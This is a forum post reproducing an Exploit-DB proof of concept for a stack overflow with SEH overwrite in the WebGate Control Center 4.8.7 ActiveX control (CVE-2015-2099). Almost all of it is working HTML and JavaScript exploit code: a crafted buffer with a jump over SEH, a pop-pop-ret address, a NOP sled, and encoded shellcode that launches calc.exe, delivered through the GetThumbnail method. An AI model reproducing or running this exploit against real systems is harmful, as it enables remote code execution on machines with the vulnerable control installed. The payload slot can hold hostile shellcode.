Jump to content
KhiZaRix

WebGate Control Center 4.8.7 GetThumbnail Stack Overflow

Recommended Posts

<html>

<!--

Author: Praveen Darshanam

Security Unplugged !!!

Security Unplugged !!!

# Exploit Title: WebGate Control Center GetThumbnail Stack Overflow SEH Overwrite (0Day)

# Date: 27th March, 2015

# Vendor Homepage: WEBGATE | HD-CCTV solution provider

# Software Link: Software | HD DVR, HD camera, SD DVR, IP camera, storage, management software - WEBGATE

# Version: Control Center 4.8.7

# Tested on: Windows XP SP3 using IE/6/7/8

# CVE : 2015-2099

targetFile = "C:\WINDOWS\system32\WESPSDK\WESPPlayback.dll"

prototype = "Sub GetThumbnail ( ByVal SiteSerialNumber As String , ByVal Channel As Integer , ByVal secTime As Long , ByVal miliTime As Integer )"

progid = "WESPPLAYBACKLib.WESPPlaybackCtrl"

-->

<object classid='clsid:4E14C449-A61A-4BF7-8082-65A91298A6D8' id='getthumb'>

</object>

<script>

var buff1 = "";

var arg2=1;

var arg3=1;

var arg4=1;

var nops = "";

var buff2 = "";

for (i=0;i<24; i++)

{

buff1 += "B";

}

// jump over seh to shellcode

nseh = "\xeb\x08PD";

// pop pop ret

var seh = "\xa0\xf2\x07\x10";

for (i=0;i<80; i++)

{

nops += "\x90";

}

//calc.exe payload

sc = "\x54\x5d\xda\xc9\xd9\x75\xf4\x59\x49\x49\x49\x49\x49" +

"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30" +

"\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30" +

"\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42" +

"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" +

"\x49\x4b\x4c\x5a\x48\x4b\x32\x45\x50\x55\x50\x43\x30" +

"\x53\x50\x4b\x39\x4d\x35\x30\x31\x4f\x30\x52\x44\x4c" +

"\x4b\x56\x30\x46\x50\x4c\x4b\x31\x42\x34\x4c\x4c\x4b" +

"\x31\x42\x44\x54\x4c\x4b\x32\x52\x47\x58\x54\x4f\x38" +

"\x37\x50\x4a\x37\x56\x46\x51\x4b\x4f\x4e\x4c\x57\x4c" +

"\x35\x31\x33\x4c\x33\x32\x46\x4c\x37\x50\x49\x51\x48" +

"\x4f\x34\x4d\x45\x51\x4f\x37\x4d\x32\x4a\x52\x36\x32" +

"\x46\x37\x4c\x4b\x36\x32\x32\x30\x4c\x4b\x30\x4a\x37" +

"\x4c\x4c\x4b\x30\x4c\x32\x31\x54\x38\x5a\x43\x51\x58" +

"\x33\x31\x4e\x31\x30\x51\x4c\x4b\x36\x39\x47\x50\x53" +

"\x31\x48\x53\x4c\x4b\x30\x49\x35\x48\x5a\x43\x36\x5a" +

"\x57\x39\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x56" +

"\x51\x4b\x4f\x4e\x4c\x49\x51\x38\x4f\x54\x4d\x35\x51" +

"\x58\x47\x37\x48\x4d\x30\x34\x35\x4a\x56\x43\x33\x43" +

"\x4d\x5a\x58\x37\x4b\x43\x4d\x46\x44\x43\x45\x4d\x34" +

"\x56\x38\x4c\x4b\x56\x38\x31\x34\x43\x31\x4e\x33\x42" +

"\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x36\x38\x45\x4c" +

"\x45\x51\x4e\x33\x4c\x4b\x54\x44\x4c\x4b\x33\x31\x48" +

"\x50\x4c\x49\x57\x34\x36\x44\x51\x34\x51\x4b\x51\x4b" +

"\x33\x51\x30\x59\x50\x5a\x36\x31\x4b\x4f\x4b\x50\x31" +

"\x4f\x51\x4f\x51\x4a\x4c\x4b\x42\x32\x5a\x4b\x4c\x4d" +

"\x31\x4d\x53\x5a\x35\x51\x4c\x4d\x4c\x45\x58\x32\x43" +

"\x30\x53\x30\x55\x50\x56\x30\x42\x48\x50\x31\x4c\x4b" +

"\x42\x4f\x4d\x57\x4b\x4f\x59\x45\x4f\x4b\x5a\x50\x48" +

"\x35\x4f\x52\x30\x56\x53\x58\x4e\x46\x5a\x35\x4f\x4d" +

"\x4d\x4d\x4b\x4f\x38\x55\x47\x4c\x53\x36\x33\x4c\x45" +

"\x5a\x4b\x30\x4b\x4b\x4b\x50\x43\x45\x43\x35\x4f\x4b" +

"\x47\x37\x32\x33\x53\x42\x42\x4f\x42\x4a\x55\x50\x46" +

"\x33\x4b\x4f\x49\x45\x43\x53\x53\x51\x52\x4c\x52\x43" +

"\x36\x4e\x55\x35\x44\x38\x33\x55\x33\x30\x41\x41";

for (i=0;i<(5000-(buff1.length + nseh.length + seh.length + nops.length + sc.length)); i++)

{

buff2 += "A";

}

fbuff = buff1 + nseh + seh + nops + sc + buff2;

getthumb.GetThumbnail(fbuff ,arg2 ,arg3 ,arg4);

</script>

</html>

Source: http://www.exploit-db.com/exploits/36518/

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...